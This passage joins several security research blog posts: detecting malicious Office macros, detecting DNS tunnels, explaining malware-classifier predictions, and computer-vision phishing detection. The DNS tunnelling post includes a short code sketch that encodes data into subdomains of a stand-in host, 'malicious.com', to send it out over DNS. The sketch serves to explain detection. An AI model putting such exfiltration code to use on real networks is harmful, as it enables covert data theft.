By checking for specific combinations of byte strings in the file, we can determine the type and format of the file and thus the the location of relevant code within the file. With that in hand, the OLE (Object Linking and Embedding) Streams must be parsed to get the full account of macro text. OLE Streams in documents are analogous to an internal filesystem and can be comprised of very few streams or many thousands. Parsing these streams helps determine which contain macro code and collecting that as text for analysis.

Finally, once all code streams (see Figure 1 below) are parsed, the text segments are passed to our feature generation process, described next.

Figure 1: Office VBA File Format Structure (Source: Microsoft)

Feature Engineering

As with most applied machine learning problems, feature engineering for malicious macro classification is one of the most important and impactful, and thus guarded, steps in the model creation process. Feature engineering means converting raw input, in this case the code streams we parsed in the previous step, into an array of numbers which our chosen modeling software can use for building a model.

For this feature, our feature engineering focused on analysis of code streams driven by close collaboration between reverse engineers, threat researchers, and data scientists. Some of our features depend on counting reserved keywords such as “connect” and “thisdocument”. Others collect string metrics, perhaps to detect obfuscation or encoding, while others conduct more involved textual analysis. All-in-all, we generate hundreds of features per sample for analysis. The final feature set is the end product of months of iteration, experimentation, and testing to ensure our desired levels of efficacy.

Lack of Solid Labels

Supervised classifiers require large, reliably labeled datasets. This is a significant challenge for any machine learning problem in security, but good labels for macros are especially hard to come by. Having no AVs call a file bad is not a stellar indicator of non-maliciousness for any file in security, and that’s an issue we’ve dealt with successfully with past classifiers. In the realm of macro enabled documents, this issue is especially challenging.

To increase certainty in a label, the industry often relies on internal, and sometimes external, crowdsourcing to generate signatures and compile blacklists. We sought to build upon that idea by developing a framework we dubbed Active Labeling to make it quick and easy for Endgame reverse engineers to provide a label for a given sample, and have that feed back into the training pipeline.

First, we generated the list of samples that would make the “biggest” impact to classification performance, specifically targeting samples that have significant uncertainty or that can most influence the decision boundary of our classifier. These samples are often scored at the good/bad threshold for a given model (e.g. 0.49-0.51). Next, we automated the extraction of the macro, IOCs, and any other metadata that could aid in the labeling of a sample and display to the analyst in a web UI. This provides an intuitive interface for the analysts to grab a sample and make a judgement as quickly as possible. These "human labeled” samples are fed back into our machine learning training to further improve performance. Active Labeling allows us not only to detect troublesome samples, but to efficiently enhance and refine our future machine learning models to better predict new and unknown samples. Our classifier would not have been shippable without significant effort in this area.

Identifying Similar Samples

One of the few things everyone (mostly) agrees about in security is how to identify a file. The file hash, such as sha256, uniquely identifies each malware sample. With PE or Macho executable malware, because of polymorphic malware and code modifications over time, looking for a hash you already know about is an imperfect method for finding that malware in the future. Despite it not being a great solution for robust future detections, a hash is a very useful and in fact an industry-standard quality to key off of when it comes to whitelisting, blacklisting, and similar actions. We need to think a little differently about macro-enabled documents.

Just like with executables, the hash of a document can be used to find that exact same file in a network. However, if someone changes even one cell in the fake spreadsheet the entire file hash changes while the malicious macro, the part we are most concerned about, remains unaffected. We should instead look at the macro itself, not the phishing content, as our anchor for sameness..

We’ve implemented an idea similar to ImpHash which we internally call MacroHash. Instead of hashing the entire file, we perform some light sanitation on the OLE Streams, order them, and hash them in aggregate. This way we uniquely fingerprint the same combination of macros across multiple host Office documents, and are unaffected by changes in the file contents and thus file hash when seeking identical samples in our training set or providing necessary customer-facing features like whitelisting.

Conclusion

MalwareScore for macros is now live in VirusTotal! Macro-enabled phishing attacks aren’t going away anytime soon. They continue to be the easiest way into many target networks, and defenses have been woefully inadequate. Creating MalwareScore for macros was truly a collaborative process across Endgame requiring significant cross-functional innovation. We’re very excited to share it with the wider security community through inclusion in VirusTotal. The description of challenges we faced when building MalwareScore for macros furthers our commitment to demystifying security and provides transparency to our current and future customers about how Endgame takes features from idea to product.

DNS tunnelling is a technique that misuses Domain Name System (DNS) to encode another protocol’s data into a series of DNS queries and response messages. It received a lot of attention a few years ago, when malware families like Feederbot and Morto worm were discovered using DNS tunneling as a command and control (C&C) channel.

However, as Internet architecture has evolved, many of the techniques that were developed to detect DNS tunnels now create false positives. Evolutionary changes to the Internet, which include the widespread use of Content Delivery Networks and unconventional applications of DNS such as reputation/blocklist lookups and telemetry, has made it harder to detect DNS tunnels. Because of the challenges, and given their ongoing popularity as an attack vector for data theft, I revisited this topic and recently presented some of the results of my research at BSides Charm. In this blogpost, I’ll walk through the basics of DNS tunneling, some challenges with detection, and offer recommendations for detecting these attacks while limiting false positives.

Back to basics

DNS is mainly known for mapping domain names to IP addresses. This is achieved using A and AAAA records for IPv4 and IPv6 records respectively. In addition to these records, DNS also provides a range of other record types for a wide variety of applications. For example, CNAME records are used to create aliases for a domain name, MX records are used to discover Mail exchange, and TXT records are used to exchange arbitrary data associated with the domain.

Upstream data in DNS query field and downstream data in DNS response RR fields

Since DNS is such a fundamental protocol, outbound DNS access is enabled in even very restrictive environments. DNS tunneling abuses this ubiquity of DNS to create covert channels for C&C or data exfiltration. DNS tunnels work by sending upstream data in a DNS query field, and receive downstream data in DNS response RR fields.

A domain name is limited to 255 characters from the character set [a-z0-9-]. In order to send binary data upstream via this field, the data must be encoded to meet this character set requirement. The following code illustrates how upstream data may be encoded.

data = base32(binary_data)
csize = 255 – len(‘.malicious.com’)
for chunk in (data[i:i+csize] for i in range(0, len(data), csize)):  
	labels = [chunk[j:j+63] for j in range(0, len(chunk), 63)]
	fqdn = ‘.’.join(labels) + “.malicious.com”
socket.gethostbyname(fqdn)

The downstream data is sent using various resource records (RR). Each RR format has a size and character set limitation. PRIVATE and TXT records allow 216 [a-zA-Z0-9-+] characters. CNAME, MX and SRV records have the same format as a DNS query. The size and character-set restrictions of each RR record put a limitation on the amount of data and the encoding function that can be used. The adversary’s decision to use one RR type over the other in a covert channel comes down to stealth versus bandwidth as data transfer requirements are balanced with the desire to remain undetected.

DNS tunneling has some properties that set it apart from other tunneling techniques like ICMP tunneling:

DNS is ubiquitous. It is enabled even in the most restrictive networks. Airline and hotel WiFi DHCP and DNS are two protocols that are usually enabled before all the traffic is restricted behind a paywall.
DNS tunneling is relatively performant. As far as covert tunneling protocols go, DNS tunneling performs well in terms of latency and bandwidth.
It doesn’t require a direct connection between the attacker and the victim. The DNS traffic is usually relayed through a recursive resolver that performs queries iteratively on behalf of the client. Netflow collected on the host will not reveal a direct connection to the attacker.
Upstream only channels can be very stealthy. If an attacker is only interested in an upstream channel, for example data exfiltration, DNS tunneling doesn’t have to use the DNS responses. It may allow all of the DNS queries to fail with NXDOMAIN or a FORMAT_ERR, and go under the radar of DNS monitoring applications.
Built-in load balancing. Lastly, DNS tunnels don’t have to use a single domain name to exchange traffic. It can be spread over multiple domains sharing the same nameserver. This provides additional stealth and resilience, since no single domain would stand out as on outlier in the network traffic baselines.

The False Positive Challenge

DNS tunnels encode binary data into an ASCII format, which is then transferred as a domain name in a DNS query. Such domain names, generated from encoded binary data, have high entropy. Moreover, in order to achieve high bandwidth, DNS tunnels encode the largest possible chunk of binary data in each packet, yielding large DNS packets. So, given a stream of DNS traffic from a DNS tunnel, one would observe a large number of long subdomains under the registered domain, each with high entropy.

In contrast, web traffic is usually comprised of domain names that are short, easy to remember, and derived from a spoken language. Therefore, normal DNS traffic is expected to have smaller DNS packets containing domain names with low entropy.

High entropy, a large number of subdomains, and large packet size may seem like reliable indicators of a DNS tunnel. But that approach now yields an unmanageable volume of false positives.

One of the primary reasons for this is the advent of CDNs (Content Delivery Networks). Consider a domain that is hosted on a large CDN. The content delivery mechanism usually works by creating a CNAME record (i.e. alias), for each hosted customer domain to a unique, often random-looking subdomain of a CDN domain. The DNS resolution of this CNAME is how the content delivery optimization is actually delivered.

DNS resolution of www.baltimoresun.com

It is easy to see the parallels of this property to a DNS tunnel - a large number of subdomains, each with high entropy.

This large number of subdomains may not be limited to a small set of CDN domains. Some services create a large number of sub-domains directly under the customer’s primary registered domain.

One of the many DNS queries generated from browsing www.tomshardware.com

In addition, some services utilize DNS for non-conventional use cases like file/domain reputation lookups, telemetry etc. Spamhaus provides a DNSBL service to lookup reputation of domains. Team Cymru provides an extensive ASN & BGP peer lookup service over DNS. DNS traffic to these services also yield false positives.

In the past, SOCs have gotten away with reactive whitelisting. But as more and more such services come online, a whitelisting approach just doesn’t scale.

Layered Approach to Detecting DNS Tunnels

Given these challenges, we need a layered approach to sift through DNS traffic, with each layer attacking a particular aspect of a DNS tunnel. These layers consist of record types and sizes and access patterns.

Record types and record sizes

Resource Record types

NULL and Private RR types have very limited valid use cases. These RRs in DNS traffic should raise an alarm. TXT records have some valid domain specific use cases. But in spite of that, the number and size of TXT RRs per domain can be used to detect the simplest of DNS tunnels.

Question and RR size

DNS packet size alone is no longer a good indicator of DNS tunnels. Many domains provide a large number of records for redundancy and load balancing. In addition, AAAA resource records are large and can skew the baseline. If we dig deeper into the DNS packet, query length and individual RR size can be a good feature used for detection.

In particular, subdomains greater than 180 characters and two or more labels greater than 52 characters should be considered highly suspicious. These thresholds are evident from the following two graphs plotting maximum query length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and malicious DNS tunnels are plotted in the red.

Maximum query length on the x-axis, frequency in log scale on the y-axis

Similarly, the size of individual RRs in each response can be a good indicator of the existence of a DNS tunnel. Consider the following two graphs plotting the maximum RR length on the x-axis and the frequency of observing that value expressed on a log scale on the y-axis. Benign domains are plotted in blue and DNS tunnel domains are plotted in red.

Maximum Resource Record length on the x-axis, frequency in log scale on the y-axis

Outliers in the subdomain’s length, number of labels in the subdomain, and maximum resource record length together help narrow down the field to a small set of potential candidates of a DNS tunnel.

Access patterns

Unique subdomains

As mentioned earlier, the number of subdomains per domain doesn’t always indicate a DNS tunnel. You’ll find that CDNs domain names (e.g., akamaiedge[.]com) or domains that host its user content on subdomains (e.g., blogspot.com) also create a large number of subdomains. What separates a DNS tunnel domain from other domains that have a large number of subdomains is repeat queries. In particular, subdomains created by DNS tunnels are usually only queried once. Therefore, the ratio of the number of unique subdomains to the number of queries per domain works as a much better indicator of a DNS tunnel.

Loose ends

Lastly, DNS tunnels leave some loose ends. To understand that, let’s consider the response from dig www[.]amazon[.]com :

DNS resolution of www.amazon.com

A CNAME record sets another domain as an alias of the queried domain. The new CNAME FQDN may in turn be an alias of a third domain. But, eventually, the alias domain resolves to an IP address, either with a A/AAAA record inserted proactively, or via an explicit query. The DNS query is usually a precursor to an IP connected to the resolved FQDN. The same is true for MX or SRV records. DNS tunnels, on the other hand, don’t have that requirement. There is no intention to ever make an IP connection to the resolved domain name. If we track all RR for a domain and find out that it leaves a large number of those new RR unresolved to an IP address, it is a strong indicator of a potential DNS tunnel.

Conclusion

Ubiquity of DNS makes it easy for an attacker to create DNS tunnels and go undetected under the large volume of DNS logs that an enterprise usually generates. But it isn’t particularly hard to employ the aforementioned techniques to detect DNS tunnels. While DNS tunnels may successfully hide the data in the protocol fields, it is much harder to feign the behavior and access patterns of a benign use of DNS.

Now that we can detect DNS tunnels reliably, it is important to provide a final word on DNS privacy and its applications on DNS tunneling. There has been a lot of interest lately in providing DNS privacy to consumers. There are two protocols that continue to garner support and widespread deployment - DOH (DNS over HTTPS) and DNS over TLS. These protocols provide confidentiality to DNS lookups to thwart passive introspection. In the future, DNS tunnels may also utilize these protocols to evade detection. In turn, our detection mechanisms will evolve by relying more on the access patterns and high order behaviors, than on packet introspection.

When optimizing machine learning (ML) models, model performance often is prioritized over model interpretability. However, in the field of information security interpretability is a sought after feature, especially in the realm of malware classification. By understanding why a model classifies a binary as benign or malicious, security practitioners are better equipped to remediate an alert.

We worked with the ember benchmark model, a classifier that is currently not interpretable, to design a measure of interpretability that will determine which features contribute to the model’s predictions. This enables future ember users to quickly interpret and explain their findings, highlighting the value of focusing on both performance and interpretability in ML models.

Methods for Model Interpretability

There are many ways to approach model interpretability, including partial dependence plots (PDP), local interpretable model-agnostic explanations (LIME), and Shapley values.

The Shapley values method, which quantifies how much each model feature contributes to the model’s prediction, is the only one that can determine each feature effect on a global scale and thus give a full model explanation. For this reason we chose to use SHapley Additive exPlanation (SHAP) Values, an extension of the Shapley values method, to assess interpretability for the ember benchmark model. For a given model, all the SHAP values are summed to get the overall difference in model prediction in comparison to the baseline prediction without considering feature effect. The SHAP paper is available here and the open source code we utilized is available here.

It is important to note how SHAP values are correlated to file classification. When interpreting malware classification models, lower SHAP values push the model towards classifying a file as benign, whereas higher SHAP values push the model towards classifying a file as malicious.

Applying SHAP for Model Interpretability

We applied SHAP value-based interpretability to the ember model in two ways: model summary and single file. Each of these are discussed below.

Model Summary

The ember dataset consists of raw features extracted from over one million files/samples that are used as training/test sets for the ember model. Each file’s raw features are converted into 2351 vectorized features. By creating a SHAP summary plot for the model, we were able to determine the 20 features (out of 2351) that affected the model the most and how changes in these values affect the model’s prediction.

Figure 1: A summary for all the files/samples in the ember dataset of the correlation between feature values and SHAP values

This plot shows how high and low feature values are related to SHAP value. For example, Feature 637 (machine type) is the most important model feature because high and low feature values directly correlate to high and low SHAP values. In comparison, other model features are less important because there is less distinction between high and low features values and their resulting SHAP values are closer to zero. This can be seen with Feature 504 (byte entropy histogram), as its corresponding SHAP values are closer to zero and thus has less impact on the model. We were able to use this plot to get a better understanding of how certain features affected the ember model decision.

Single File

While understanding features’ effects on the model is important, ideally we want to provide a file and identify how the features in that file specifically influence the model’s prediction.

Within the ember dataset, each file’s raw features are already converted into 2351 vectorized features and categorized into eight feature groups (Byte Histogram, Byte Entropy Histogram, String Extractor, General File Info, Header File Info, Section Info, Imports Info, and Exports Info).

It would be possible to visualize how each of these 2351 features contributes to the model; however, we determined that the visualization would be too cluttered for a user to extract any meaningful information. Instead, it would be more informative to understand how each feature group contributed to the final prediction so that the user would know what part of the file to scrutinize more.

We added together the SHAP values for all the features in each feature group to get an overall SHAP value for each group, and then created a force plot (see example below) to visualize each feature group’s overall effect on the model’s prediction.

Figure 2: Most of the eight feature groups in this specific file push the model towards classifying the file as malicious (red)

In addition to feature group importance, we also provide a list of the top five features in the file that contribute to the prediction the most, as well that feature’s information. An example can be seen here:

While we can say which features contributed most to the model’s prediction and what groups/subgroups they are in, the next step would be to identify what exactly that feature represents. For example, from the visual above, we can say that Feature 620 is a part of the General File Information, specifically the exports section, but ideally, we would be able to determine exactly which export contributes to how the file is classified.

Conclusion

With the possible extensions mentioned above, we now have a measure of model interpretability for the ember model that will help us better understand why it classifies certain files as benign or malicious. Ideally, this interpretability feature could be implemented for other classifiers so that researchers in information security can quickly identify and respond to a security alert.

As shown through the ember model, interpretability provides more detailed insights about ML models. These insights will allow researchers to move past current ML black box predictions, thus highlighting the importance of model interpretability and transparency within ML models.

Yesterday, Microsoft announced the discovery and removal of websites spoofed by the Russian military that mimic real Senate and political organizations' sites. As their blog notes, “Attackers want their attacks to look as realistic as possible and they therefore create websites and URLs that look like sites their targeted victims would expect to receive email from or visit.” These are exactly the kinds of attacks that often host malware or steal credentials, and are well-suited for detection by our computer-vision based phishing detection tool, Blazar. Blazar is one of two recent computer vision-based projects by Endgame Research, illustrating how valuable computer vision can be to protect against phishing.

This high-profile attack demonstrates how prevalent phishing attacks remain. Modern day phishing has been around since the advent of email and is simply based on classic confidence scams. Prevention methods have been around just as long, and they work great to significantly reduce the more common and less creative attempts. However, as the Microsoft announcement illustrates, phishing remains one of the most common methods of entry or attack for a malicious actor. While criminals often use phishing as part of an attack driven by financial gain, nation-states or state-affiliated groups increasingly use phishing for espionage.

At Endgame, we’re constantly pushing boundaries and developing new tools and techniques to solve security problems. We have stayed on top of the range of new applications of computer vision, but saw that it was underused in the information security space. In this and a subsequent blog we will demonstrate how computer vision can be applied to the phishing challenge, including an introduction of the two approaches which we presented at BSidesLV: 1) Blazar: URL spoofing detection, and the focus of this first post; 2) SpeedGrapher: MS Word macro malware detection, which will be covered in detail in the subsequent post.

These detection techniques each use computer vision, but they focus on different aspects and tricks used in phishing campaigns to protect against a greater range of attacks. Blazar detects malicious URLs that masquerade as legitimate ones, the tactic used in the Russian military hacking operation announced by Microsoft. In a subsequent post, we’ll describe SpeedGrapher, which looks at the first page of Word documents to “see” if the contents ask you to do something suspicious. Our techniques, combined with traditional phishing detection technologies, can provide a powerful defense against these prevalent attacks.

Current Methods of Phishing

According to the Verizon 2018 Data Breach Investigations Report, approximately 70% of breaches associated with nation-state or state-affiliated actors involving phishing. Phishing continues to be effective, is getting more sophisticated, more targeted, and harder to detect. 4% of people targeted will click on the attachment, 94% of the time the attachment is malicious. Only 17% of attacks are reported and of those, it takes 30 minutes on average to report it.The costs of phishing to American businesses continues to grow, reaching over half a billion dollars last year.

Many strategies exist, and help out greatly, to cut down on the number of phishing emails from larger, more obvious, campaigns. Email spam filters do a wonderful job. If you doubt this, look at how many have already been caught by your email client/provider. These often work because other users flag spam and that information can be aggregated and distributed to everyone.

Most email hosts also use third party antivirus software to scan email attachments for potentially malicious files and warn the user or remove the offending files. Modern browsers also do us all a favor by curating and maintaining blacklists of malicious or suspicious domains. They will often block the initial loading of a site and instead warn the user to proceed with caution.

Finally, the last line of defense has traditionally been the user. This takes the form of IT and security training. Many large companies have, as they should, regular required training for how to detect suspicious messages over email and social media. While often boring and burdensome, regular training can keep users aware and alert.

However, as stated before, phishing is still a problem. These solutions are incomplete, and more work is necessary on the defensive side to keep up with the mouse and mouse-trap nature of phishing. To help out, we’re showcasing computer vision based approaches to detect malicious intent.

Why Computer Vision

Computer vision has come a long way from detecting cats in youtube videos. You can now also detect raccoons:

It is also used daily in fields from medical imaging to self driving cars.

In general, computer vision works well when you can answer “yes” to the question of: “Can an attentive user identify this?”. For our specific example, the question is “Can an attentive user identify phishing?”. So, dear user, let us test the question!

Below is an example email. Would you click the link and download the FlashPlayer update?

Probably not. You’ll see that the regular “b” character in “adobe” was replaced with a “ḅ” (U1E05) and thus directs to a completely different domain.

These kinds of attacks are called homoglyphs. A homoglyph attack, as the name suggests, is a deceptive attack exploiting the visual similarity of different characters. For the purpose of this project we extend the definition slightly to include character additions and removals. Some examples are:

This isn’t just a made up or academic problem. The fake adobe update example was from an actual campaign in September 2017 to distribute the betabot trojan.

Possible Methods for Detection

One approach to detect these spoofs is to use Edit Distance which counts the number of insertion, deletions and substitutions. For example:

This works to an extent, but runs into some real problems when extended character sets are allowed. We could easily replace “microsoft.com” with other unicode characters so that it is nearly identical visually but has an edit distance of 9, replacing the entirety of “microsoft” with other characters.

A fix for that attack is to provide weights for each character combination based on visual similarity and adjust the final edit distance score accordingly. Example weights are:

You’ll notice that ‘0’ and ‘O’ are scored as very similar, as are “1” and “l”, while “2” and “E” are scored as dissimilar. This helps in the problem of detecting visual similarity. But, to complete this mapping (especially when you consider multiple character combos like “cl” -> “d”), the matrix of values to populate becomes enormous and burdensome.

Introducing Blazar for Detecting Homoglyph Attacks

Instead, we introduce Blazar. The formal description of our Blazar project is “Detecting Homoglyph Attacks with a Siamese Neural Network”. If you want to skip to the code and paper you can find our public repo and our paper on Arxiv or IEEE.

The primary idea is to convert text => images => feature vectors and then train a neural network to create the feature vectors such that similar looking strings (potential homoglyph attacks) have vectors with a small Euclidean distance while dissimilar strings (completely unrelated URLs) have a large Euclidean distance. Additionally, since comparing feature vectors in a linear fashion can become slow if using tens of thousands of samples, we’ll be implementing a KD tree based indexing and lookup system to speed things up.

Training Data

We first must generate data on which to train our network. We start with a large variety of base URLs (facebook.com, espn.com, wikipedia.org, etc) and generate a set of spoofed versions for each. This is as easy as generating a set of methods (replace “o” with “0”, replace “d” with “cl”, insert “-”, etc) and implementing them at random. For example:

Creating and selecting your training data provides the flexibility to tailor this operation to specific types of spoofs or add more flexibility to cast a wider net while still letting the algorithm handle the generalization and abstraction of what “looks” similar. Our training examples above lean toward homoglyph character replacement as well as small scale character insertion throughout the string. The set could be tailored to larger insertions on either side of the string to perform even better against attacks Microsoft just announced such as my-iri.org vs iri.org.

Convolutional Neural Networks

As with most neural network based image analysis systems, we’ll be using convolutional neural networks (CNN). You can find dozens of explanations and tutorials online, so we’ll keep this part brief. Simply, a CNN scans a sliding window over an image and for each view applies many convolutions; small matrix operations designed to identify features of an image. While training, these convolutions allow the network to learn features such as curves and line orientation, as well as their importance to the overall classification problem. With larger networks and more layers, we’re able to learn more complex shapes and features, and thus better understand objects.

Our network is actually quite simple and textbook, as far as CNNs go.

CNN Layer Structure

Training

Now that we have data and a network model, we have to train our network to understand similarity. In a traditional classification task, you might feed a sample through your network and expect it to have a result value of 1 or 0, signifying a binary class. Our task though is to identify similarity between many different strings, so we’re going to be using a Siamese neural network.

Siamese neural networks work by feeding two sets of input, URL images in our case, into the network and getting out two sets of output, feature vectors. We then find the distance between the feature vectors. If the inputs are supposed to be spoofs, such as “google.com” and “gooogle.com”, we want this distance to be 0. If the inputs are not supposed to be spoofs, such as “google.com” and “facebook.com”, we want this distance to be 1. Once a set of samples is passed through the network and evaluated, we measure the error and back propagate the error correction through the network just like any other neural network training. The diagram below outlines a training step for our network.

Siamese Neural Network Example Training Step

After many samples have been run, we have a trained network. To ensure it has learned what we intended it to learn, we’d like to plot a few samples and see their distances. However, our feature space is 32 dimensions, and that’s not a whole lot of fun to visualize. Instead, we can use a data reduction technique called Principal Component Analysis, PCA. This effectively creates a projection of your data into a smaller dimensional space, two dimensions in our case.

You can see that “google.com” and its spoofs are clustered together, as are “facebook.com” and its spoofs. However, the cluster centers of “google.com” and “facebook.com” are far away from each other. This demonstrates that our network has learned its intended behavior.

To implement this as a service, we take our trained neural network and run the domains we want to protect, perhaps the top 50k Alexa domains, through it. This produces a set of feature vectors that we can then index in the KD Tree. When we have a domain that we want to check to see if it is a spoof or not, we can run it through the neural network to create its feature vector and then check that feature vector against our KD Tree index. If it is close to a known/protected domain, then it is a potential homoglyph attack.

Evaluation

As with any machine learning application, effective evaluation of your proposed solution, especially against alternatives, is vital. We could measure this with a simple accuracy measurement, correct values divided by total values. However, that depends on setting a threshold to determine what is considered correct. Instead, we typically use a ROC curve, short for Receiver Operating Characteristic. This is a measurement of the false positive rate (FPR) on the x-axis vs the true positive rate (TPR) on the y-axis. Below we show a ROC curve of Blazar, edit distance, and visual edit distance.

With this you can get an appreciation of how your model would perform in a range of thresholds which can be determined by the FPRs and TPRs. If you would like to have an aggressive detector, you can set a high TPR, which would correspond with a high FPR and the right side of the chart. Conversely, if you’d want a conservative detector, you could set a low FPR, which would correspond to a lower TPR and the left side of the chart. Additionally, we can measure the area under the curve (AUC) to get an idea of how one model stacks up to another over the entire range of thresholds.

With this, we can see that the edit distance based technique gets an AUC of 0.81, not terrible. For comparison, an AUC of 0.5 is represented by the diagonal line and is equivalent to a 50/50 coin toss. Visual edit distance makes strong gains with an AUC of 0.89, however we mentioned earlier the challenges of mapping the similarity scores for ever character pair. Our technique with a Siamese CNN based on an image of the entire string gets an AUC of 0.97, a significant improvement over the state of the art.

From Homoglyphs to Macro Malware Detection

We have much more information on Blazar, our approach to detecting homoglyph attacks on our public repo and in our paper on Arxiv or IEEE.

Microsoft’s announcement of the Russian military campaign to spoof prominent political websites illustrates the gravity of homoglyph attacks. Of course, as effective as homoglyph-based phishing attacks are, phishing attacks entail additional modes of compromise. Fortunately, computer vision again turns out to be an effective approach for detecting other forms of phishing. In our next post, we will give an overview of another Endgame research project - SpeedGrapher: MS Word macro malware detection. Together, Blazar and SpeedGrapher demonstrate just how useful computer vision can be for detecting phishing, while also illustrating the numerous creative and impactful aspects of modern phishing campaigns.

In the previous post, we discussed the problem of phishing and why computer vision can be a helpful part of the solution. We also introduced Blazar, our computer vision tool to detect spoofed URL. Today we will discuss the second tool we developed that applies computer vision to phishing - SpeedGrapher.

While Blazar focuses on detecting homoglyph attacks (i.e., attacks based on visual character similarity in URLs) with computer vision, SpeedGrapher detects macro-enabled document based phishing. In this post, we describe the growing use of macro-enabled document based phishing and introduce our solution, SpeedGrapher. I presented each of these tools at BSidesLV, demonstrating how Blazar and SpeedGrapher address two often used phishing techniques, while illustrating the power and potential for computer vision to detect phishing.

Overview of Macro-Enabled Document Based Phishing

Phishing attacks can take many forms, one of the most prominent of which exploits the natural tendency to download attachments. In these macro-enabled document based phishing attacks, attackers continue to find success by tricking victims to open malware-embedded documents as attachments in their email. Let’s look at a Word document you could have been emailed.

Example Document

This whole document should throw warning signs. It has instructions on how to “Enable Content” (i.e. enable macros), and includes typos/misspellings such as “Macroses”. These generally are telltale signs of a phishing attack. Enabling content usually sets off a script that downloads a payload to start an attack or sends back valuable information to a C&C server. As we’ve detailed elsewhere, these kinds of attacks with payload delivery have been deployed in some of the most high profile attacks by nation-states, and remain a favorite attack vector by criminals seeking financial gain.

Bounding the Problem Set

Since this is a vision based exploit, let’s define the problem in a visual way, too. We want to detect the image on the left as malicious and the image on the right as not.

Malicious (left) and Benign (right) Docs

This is the first page of both documents. The one on the left has a lure stating that you can’t read the document due to an incorrect version and requests to “Enable Content”. This is suspicious, especially since the instructions are just an image, and MS Office does not make requests like this. The document on the right is plain text with a few hyperlinks, nothing looking too suspicious except that it talks about macros. Given that many of these suspicious clues are visual, we began creating SpeedGrapher to explore how computer vision may assist in detecting these kinds of phishing attacks.

Getting Started: How We Built SpeedGrapher

As with most computer vision applications, SpeedGrapher is an ensemble of many different techniques. While that sounds complicated, and computer vision in general has an intimidating reputation, this is actually a bonus. Each piece of the solution is relatively straightforward, although some are more complicated than others, and can be understood and completed in chunks. We first need to gather samples and then focus on feature generation.

Gathering Samples

To get started, the first thing we need to do is gather samples. At Endgame, we have a large sample set from our work in making a macro text based classifier. But you can curate your own set from sources like VirusTotal or other file collection and scanning services.

With the samples in hand, the next step is to capture an image of the first page of the document for clues of malicious activity. One method would be opening the actual file and taking a screenshot of it. However, this is manual and slow. It perhaps could be automated, but that sounds overly complex. Instead, we get a preview from the Word Interop class which contains the logic Word itself uses to interface with a document. Microsoft has great documentation of this here.

Note on safety: With Blazar we were just dealing with strings, now we’re dealing with actual malware. It is worth sandboxing: disable internet, disable macros, enable Windows Exploit Guard for Word.

Generating Features

We generated the following features: prominent colors, blur/blank area detection, optical character recognition, and icon detection. Each of these are described below.

Prominent Colors

To calculate prominent colors, we use K-means clustering over the RGB space of the document. We first start with an image:

Example Document

These images are actually just comprised of a series of pixels with color coding (RGB in our case). We take each pixel and map it into a three dimensional space corresponding to its Red, Green, and Blue values, irrespective of its position in the image. If the image was mostly white, as in this case, we’ll see a lot of data points at the 255, 255, 255 coordinate. If mostly black, we’ll see a lot at 0, 0, 0.

After our data is mapped, we cluster it. K-means clustering is an algorithm that takes the number of clusters, K, as input. We’re going to look for three clusters. The algorithm randomly initializes three clusters in our space and then finds all points that are closer to it than any other cluster center. Next it aggregates those assigned points to find a new centroid, and moves to that position. It then repeats this process (find closest points, aggregate, move, etc) until it reaches steady state or a maximum number of iterations have passed. This produces a set of three color centroids and the corresponding size of their clusters, as you see below

Visualization of Color Clusters

Notice that the largest cluster is white, the next is yellow, and the final cluster is comprised of the little bits of red and black in the image resulting in a brown hue. You can do this yourself by following along with this blog.

Blur Detection

For blur detection we focus on a common technique attackers use to fake the idea that content is hidden. The below document shows a blurred out background with a notification asking the user to “Enable Content” to see the full document. But this is just an image, there is no hidden content.

Blur Detection Example

To measure this, we’re going to find the variation of the Laplacian, which is a second order derivative and measures the sharpness of change. Thinking back to calculus, this is akin to acceleration in the position, velocity, acceleration set. Velocity is the rate of change of position (first order derivative). Acceleration is the rate of change of velocity or the rate of change in change of position (second order derivative).

For a gray-scale image, a white pixel right next to a black pixel right next to a white pixel would have a large measure of sharpness of change. A white pixel with smooth transition of gray pixels to a black pixel would have a small measure of sharpness of change and would also correspond to a blurred image. You can find a guide to do this yourself with this blog.

Blank Detection

Blank detection is a feature that is useful in determining if an attacker is attempting to trick a user with a seemingly broken or corrupt document. We calculate some simple statistics on the average of the RGB values, such as mean, variance, and max. From those values we can numerically show that the image on the left is not blank and the image on the right is blank. Additionally, the mean will tell us what color the blank section is.

Not Blank (left) and Blank (right) Docs

Optical Character Recognition

Optical Character Recognition (OCR) is a well worn topic, so we won’t spend time getting into the technical details of translating and converting characters identified in images. There are several technologies that do this well, such as Google’s Tesseract. We decided to use UWP OCR since it was native in Windows 10. Additionally, we implemented text translation via a Google Cloud API to convert as much of the text to English as possible. There are also several other text translation APIs available, like Microsoft’s.

Icon Detection

For icon detection, we use YOLOv3. This is a very cool object detection framework. YOLO in this context stands for You Only Look Once, as it scans an image once to determine both image class and bounding box. Please check out the paper and website for more information. We’ll explain it briefly, but they provide much more detail and we highly recommend it.

The general idea is to take an image and section it into cells. Each cell is assigned a probability of fitting with a class from the classes you’re training it to detect. At the same time it is determining possible bounding boxes for objects. It then combines the cell class probabilities and bounding box probabilities to find high confidence predictions and boxes.

YOLO Cell Grid

YOLO Bounding Boxes

YOLO Detection Box

For our purpose, we decided to detect five classes of objects that we saw were often used in attacks masquerading as instructions from Microsoft Office:

To train, we’ll need 1500 samples with around 300 of each class. We also apply transforms like color shifting and rescaling to make the network robust to these kinds of edits. You can follow along with this blog to train on your own dataset.

If you’re familiar with neural network training, you might immediately realise that 300 samples per class is far too small of a training set for a task of this nature. Generally speaking you would be correct. However, we’re going to leverage Transfer Learning to accelerate our work. Transfer learning in this context is training a network on a large dataset and general task and then adding a final training run on a smaller set with a specific task. The large dataset training time allows the network to learn how to recognize generic features (and importantly be saved and shared), and the small dataset training time focuses the network on the specific task at hand.

For our training we are using this port of YOLO for Windows and a network pre-trained on a large ImageNet set.

The end result is quite good. We can submit a sample to our YOLO network and get output on any specific icons detected and the confidence in those icon detections. Visually, the identification of icons and determination of their bounding boxes would look like:

YOLO Object Detection Results

Combining Features

After all the feature generation is done, we get a json blob for a sample that looks something like:

{
  "sha256": "0a0a5e96f792ab8cae1a79cc169e426543145cb57b74830b548649018a7277f4",
  "data": {
      "img": {"blank": {"data": [253.4725,
                                 118.46424375000001,
                                 255.0],
                        "heur": false},
              "blur": {"data": 470.48171167998635,
                       "heur": false}},
      "top": {"blank": {"data": [243.6475,
                                 1141.22824375,
                                 255.0],
                        "heur": false},
              "blur": {"data": 941.7518285537251,
                       "heur": false}},
      "btm": {"blank": {"data": [254.9825,
